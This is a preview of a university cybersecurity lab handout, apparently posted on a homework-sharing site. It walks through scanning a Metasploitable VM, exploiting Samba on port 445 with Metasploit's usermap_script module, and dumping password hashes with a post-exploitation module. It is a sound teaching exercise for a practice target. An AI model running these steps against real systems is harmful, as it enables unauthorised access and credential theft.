ThreatProtectionTestingLab2Exploiting(Samba)onport445andobtainingpasswordhashes(1)

.docx

School

Full Sail University *

*We aren’t endorsed by this school

Course

CYB3841

Subject

Information Systems

Date

Feb 20, 2024

Type

docx

Pages

3

Uploaded by JusticeMink2465

Report
Threat Protection & Testing Lab 2 – Exploiting (Samba) on port 445 and obtaining password hashes 1. Login into FullSail lab environment 2. Browse to your Kali VM a. Obtain your local IP address by opening the terminal and typing ifconfig b. Obtain the local IP address of the Metasplotiable VM 3. Perform a nmap scan against the Metasploitable VM Note: Notice that port 445 is open 4. Launch the msfconsole 5. After the msfconsole is up, run this command “search samba”
6. Copy “exploit/multi/samba/usermap_script” and run this command “use exploit/multi/samba/usermap_script” 7. Run “use exploit/multi/samba/usermap_script 8. Next, run the “show options” command, then run the “set RHOST” command and “show options” again. 9. Next, run “exploit” command and then press ctrl + z to put your session in the background. You should know have a connection to the targeted device. a. Run the “session -l” to see your active session 10. Now we must perform the “use post/linux/gather/hashdump” command, run the “show options” command, set to your session by running “set SESSION <your session number> a. Run the “exploit” command 11. After the exploit runs copy the Unshawdowed Password File path
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
  • Access to all documents
  • Unlimited textbook solutions
  • 24/7 expert homework help